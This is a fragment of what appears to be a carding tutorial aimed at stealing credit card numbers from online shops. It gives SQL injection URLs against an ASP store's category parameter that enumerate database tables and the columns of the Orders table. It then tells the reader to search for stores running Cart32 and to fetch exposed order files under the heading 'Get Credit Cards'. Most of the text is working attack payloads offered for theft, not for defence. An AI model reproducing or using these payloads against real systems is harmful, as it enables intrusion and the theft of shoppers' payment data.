... http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','ItemGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Secure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses'))) sp_password

CC is usually stored in the Orders or creditcard tables; here I choose Orders to hack. Get the first column:

http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')))

... keyword "Cart32.exe v3" first go to

http://www.sitename.com/cgi-bin/cart32.exe/sitename

Get Credit Cards:

http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt

or:

http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt

Ví...